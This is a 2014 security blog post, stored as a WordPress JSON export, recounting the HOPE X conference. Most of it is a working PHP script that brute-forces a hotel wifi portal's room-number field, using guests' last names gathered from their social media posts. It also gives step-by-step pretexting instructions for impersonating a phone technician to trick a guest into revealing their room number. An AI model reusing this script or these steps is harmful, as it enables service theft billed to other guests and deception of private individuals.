{"id":839,"date":"2014-07-25T19:30:39","date_gmt":"2014-07-25T19:30:39","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=839"},"modified":"2014-07-25T19:30:39","modified_gmt":"2014-07-25T19:30:39","slug":"hope-x-and-stuff","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2014\/07\/hope-x-and-stuff\/","title":{"rendered":"HOPE X and stuff"},"content":{"rendered":"

Salutations!<\/p>\n

HOPE X, my first HOPE went pretty well. I wanted to speak on an official capacity, however was rejected. I instead had to settle for an impromptu speech in one of the other rooms. I spoke on the basics of breaking apart malware and made the most of what little I had. Aside from that, the con was pretty cool. Awesome talks, awesome people, awesome town. Never been to NYC before then. I will definitely go again next time. <\/p>\n

Definitely looking forward to going to Defcon.<\/p>\n

When I travel, I can never seem to leave my act at home. Take the hotel wifi for example…<\/p>\n

I noticed hotel wifi available on the room floors, however they wanted 12 bucks a day for it. When you connected to the access point, you were presented with a form that asked for 2 key pieces of info – a last name and a room number. There was no captcha. This means I need only code something up to brute force the thing. I would only need to guess the room number. With 18 room floors numbered 1-100, that gives us a total of 1800 possible combinations. The last names I got from browsing twitter \/ facebook \/ foursquare from people telling the world where they were staying. <\/p>\n

<\/p>\n

\n
#!\/usr\/bin\/php\r\n\r\n<?php<\/span>\r\n$lastname<\/span> =<\/span> "Graziano"<\/span>; \/\/ change me<\/span>\r\n$target<\/span> =<\/span> "www.registerforhsia.com"<\/span>;\r\n$timeout<\/span> =<\/span> 30<\/span>;\r\n$log<\/span> =<\/span> "log.txt"<\/span>;\r\n\r\n\tfor<\/span>($x<\/span>=<\/span>0<\/span>;$x<\/span><<\/span>1800<\/span>;$x<\/span>++<\/span>)\r\n        {\r\n\r\n\t$fp<\/span>  =<\/span> fsockopen<\/span>($target<\/span>, 80<\/span>, $errno<\/span>, $errstr<\/span>, $timeout<\/span>);\r\n\tif<\/span> (!<\/span>$fp<\/span>) {\r\n\t    echo<\/span> "<\/span>$errstr<\/span> (<\/span>$errno<\/span>)<br \/><\/span>\\n<\/span>"<\/span>;\r\n\t}\r\n\r\n\t$out<\/span>  =<\/span> "POST \/Register\/LastNameAndRoomNumberUI=02823a&NI=0050e802823a&UIP=74.113.166.146&MA=6817299F50AB HTTP\/1.1<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Host: www.registerforhsia.com<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "User-Agent: Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko\/20100101 Firefox\/26.0<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Accept: *\/*<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Accept-Language: en-US,en;q=0.5<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Accept-Encoding: gzip, deflate<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Content-Type: application\/x-www-form-urlencoded; charset=UTF-8<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "X-Requested-With: XMLHttpRequest<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Referer=https:\\\/\\\/www.registerforhsia.com\/Welcome?UI=02823a&NI=0050e802823a&UIP=74.113.166.146&MA=6817299F50AB&RN=Guest&PORT=80&ZONE=Guest&RAD=yes&CC=no&PMS=no&SIP=10.0.2.0&OS=http%3A%2F%2Fgoogle.com%2F&DEVICE=pc<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Content-Length: 80<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Connection: keep-alive<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Pragma: no-cache<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "Cache-Control: no-cache<\/span>\\r\\n<\/span>"<\/span>;\r\n        $out<\/span> .=<\/span> "POSTDATA: last_name="<\/span> .<\/span> $lastname<\/span> .<\/span> "&room_number="<\/span> .<\/span> $x<\/span> .<\/span>"&rate_plan=1&toc=1<\/span>\\r\\n<\/span>"<\/span>;\r\n\r\n  \t$out<\/span> .=<\/span> "<\/span>\\r\\n\\r\\n<\/span>"<\/span>;\r\n\r\n\techo<\/span> "Attempt # "<\/span> .<\/span> $x<\/span> .<\/span> "<\/span>\\r\\n<\/span>"<\/span>;\r\n        echo<\/span>  "saving contents to "<\/span> .<\/span> $log<\/span> .<\/span> "<\/span>\\r\\n<\/span>"<\/span>;\r\n\r\n        fwrite<\/span>($fp<\/span>, $out<\/span>);\r\n        while<\/span> ($fp<\/span> !=<\/span> feof<\/span>($fp<\/span>)) {\r\n\t$saveme<\/span> =<\/span> fgets<\/span>($fp<\/span>,2048<\/span>);\r\n\tfile_put_contents<\/span>("log.txt"<\/span>,$saveme<\/span>,FILE_APPEND);\r\n         }\r\n\t\techo<\/span> "=========================================<\/span>\\r\\n<\/span>"<\/span>;\r\n\r\n       fclose<\/span>($fp<\/span>);\r\n\t}\r\n\r\n?><\/span>\r\n<\/pre>\n<\/div>\n
This works fine and all, but there’s a MUCH easier approach to this – social engineering yo.
\nHere’s what you do.
\n1) Find someone on social media who’s telling the world they’re staying at the hotel Pennsylvania.
\n2) Call the front desk and ask to speak to that individual. They usually blind xfer you over.
\n3) If they answer, claim you’re a technician and are testing the phone system. Ask them something like “I’m the tech fixing the system, is this room 101?”. They will correct you on the room number thus giving you the keys, figuratively speaking.<\/p>\n
Assuming they don’t modify the form, the script will continue to work. The SE approach however will always work because people are dumb. <\/p>\n
I’m in the process of finishing my p2 of Syrian malware, so stay tuned.<\/p>\n
Happy hacking!
\n\"wjdkRol\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Salutations! HOPE X, my first HOPE went pretty well. I wanted to speak on an official capacity, however was rejected. I instead had to settle for an impromptu speech in one of the other rooms. I spoke on the basics of breaking apart malware and made the most of what little I had. Aside from […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/839"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=839"}],"version-history":[{"count":2,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/839\/revisions"}],"predecessor-version":[{"id":843,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/839\/revisions\/843"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=839"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=839"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=839"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}